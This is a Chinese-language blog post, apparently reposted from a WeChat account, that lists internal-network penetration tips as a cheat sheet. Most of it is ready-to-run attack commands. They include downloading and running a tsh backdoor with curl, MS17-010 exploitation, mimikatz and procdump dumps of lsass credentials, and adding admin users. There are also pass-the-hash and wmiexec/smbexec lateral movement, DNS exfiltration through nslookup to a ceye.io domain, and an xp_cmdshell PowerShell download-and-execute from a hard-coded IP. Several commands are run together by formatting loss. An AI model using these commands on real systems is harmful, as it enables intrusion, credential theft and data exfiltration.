内网渗透Trips-1

admin
admin
admin
135666
文章
111
评论
2025年1月28日02:40:22评论3 views字数 3625阅读12分5秒阅读模式

内网渗透总结

1、last

可以查看登陆过当前机器的用户的信息,比如用户名、ip、时间等信息。

内网渗透Trips-1

例子:

内网渗透Trips-1

2、将错误输出重定向

有时候命令执行的时候,命令执行错误没有具体回显,所以将错误重定向到文件,通过查看文件来判断错误问题。

内网渗透Trips-13、负载均衡

每次使用同样的命令可以看到不同的结果。比如:

ls /tmp

如何判断负载均衡?使用hostname来判断当前的主机名。

4、tsh上线

curl http://ip:port/tshd -o /tmp/tshd;chmod 777 /tmp/tshd;/tmp/tshd; rm /tmp/tshd

5、fscan

./fscan -h ip -np./fscan -h ip -m ms17010./fscan -h ip/8 查看网段信息。只扫描1254./fscan -h ip -np -m smb -p 445 -user Administrator -pwd 123456

6、ms17010

check.bat IPms17010.bat IP WIN72K8R2go.bat IP x64

7、

SharpHound.exe -c all

8、

shell net group "Domain Controllers" /domainshell net time /domain

9、

hashdump

10、文件查询

for /r c:/ %i in (*.txt) do @echo %i

11、工具地址

https://github.com/orangetw/tshhttps://docs.microsoft.com/en-us/sysinternals/downloads/procdumphttps://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210531

12、windows常见命令

添加到管理员组 //net localgroup administrators 用户名 /add添加用户      //net user admin admin123 /add

13、Mimikatz

mimikatz.exe ""privilege::debug""""sekurlsa::logonpasswords full"" exit >> log.txtprivilege::debugsekurlsa::logonpasswordsC:>mimikatz.exe ""privilege::debug""""sekurlsa::logonpasswords full"" exit >> log.txtC:>mimikatz.exe ""privilege::debug""""log sekurlsa::logonpasswords full"" exit && dir

14、procedump-注意版本

Procdump.exe -accepteula -ma lsass.exe lsass.dmpsekurlsa::minidump lsass.dmpsekurlsa::logonpasswords

15、redis连接

C:Program FilesRedis

16、

war包制作

jar -cvf test.war text.jsp

解压

jar -xvf shells.war

17、查看域信息

net view /domain

查看某个用户的信息,是否是域管理员,当前用户所在的组。

内网渗透Trips-1

查看账户修改的密码的时间

内网渗透Trips-1

查看域用户

内网渗透Trips-1

18、建立IPC

net use \10.22.33.101ipc$ "p@ssw0rd" /user:"test"

https://www.se7ensec.cn/2020/07/12/内网渗透-基于IPC的横向移动/

19、hash传递

https://opensource-sec.com/2021/01/29/内网渗透之Hash传递攻击/

20、查找exchange

http://k8gege.org/p/FindExchange.html#ip列表

https://github.com/k8gege/LadonGo

21、windows下载文件

certutil -urlcache -split -f [serverURL]

https://mp.weixin.qq.com/s/qAHSe8bVrTlUAbHKUND3jQ

22、查询SPN

setspn -Q */* 
setspn -L username/hostname

查找指定用户/主机名注册的SPN

https://rcoil.me/2019/06/【域渗透】SPN 扫描利用

https://yoga7xm.top/2020/02/28/exchange/

https://github.com/maaaaz/impacket-examples-windows/blob/master/smbexec.exe

https://rcoil.me/2019/06/【域渗透】SPN 扫描利用/

https://cloud.tencent.com/developer/article/1562933

https://www.freebuf.com/articles/system/174229.html

https://yoga7xm.top/2020/02/28/exchange/

https://www.jianshu.com/p/aef6dfffeeef

https://blog.riskivy.com/exchange-server-in-pentest/

22、横向移动

wmiexec.exe user:pwd@192.168.1.2smbexec.exe user:pwd@192.168.1.1smbexec.exe 域/user:pwd@192.168.1.1注意:/和

https://pingmaoer.github.io/2020/06/30/域内横向移动二/

23、打包命令

tar cvf 611.tar 611
内网渗透Trips-1

解压命令

tar xvf 611.tar
内网渗透Trips-1

23、chrome密码导出

搜索直接输入

chrome://settings/passwords

24、寻找文件

dir /a /s /b d:"*.txt"dir /a /s /b d:"*.xml"dir /a /s /b d:"*.mdb"dir /a /s /b d:"*.sql"dir /a /s /b d:"*.mdf"dir /a /s /b d:"*.eml"dir /a /s /b d:"*.pst"dir /a /s /b d:"*conf*"dir /a /s /b d:"*bak*"dir /a /s /b d:"*pwd*"dir /a /s /b d:"*pass*"dir /a /s /b d:"*login*"dir /a /s /b d:"*user*"

25、谷歌、火狐文件

https://github.com/GhostPack/Seatbelthttps://github.com/carlospolop/winPE/blob/master/binaries/seatbelt/SeatbeltNet3.5AnyCPU.exe

26、文件查找

windows

for /r C: %i in (login.*) do @echo %iwhere /R C: login.*dir /s/a-d/b login.*

linux

find / -name index.phpupdatedb && locate index.php

查找文件内容

findstr /s /i /n /d:C: /c:"123123" *.txt

其中/d:是指定目录,在windows中一般为指定盘符,/c:则是指定文件内容,最后指定的是文件名字。

Linux

find / -name "index.php" | xargs grep "111222"

27、windows命令带出

在windows当中,%cd% 代表的是当前目录,我们通过echo将当前目录写入文本temp,然后荣国certutil对文件内容进行base64编码,再过滤certutil携带的字符,将它赋给一个变量,最后通过nslookup外带出来,从而实现获取当前目录的目的。

echo %cd% > temp&&certutil -encode temp temp1&&findstr /L /V "CERTIFICATE" temp1 > temp2&&set /p ADDR=<temp2&&nslookup %ADDR%.is1lv6.ceye.io

28、密码获取

https://github.com/AlessandroZ/LaZagnehttps://github.com/moonD4rk/HackBrowserData/releases/tag/v0.3.5
xp_cmdshell "powershell.exe -c IEX ((new-object net.webclient).downloadstring("http://47.94.38.147:8000/1.txt"))"

原文始发于微信公众号(0xh4ck3r):内网渗透Trips-1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月28日02:40:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透Trips-1http://cn-sec.com/archives/3680077.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息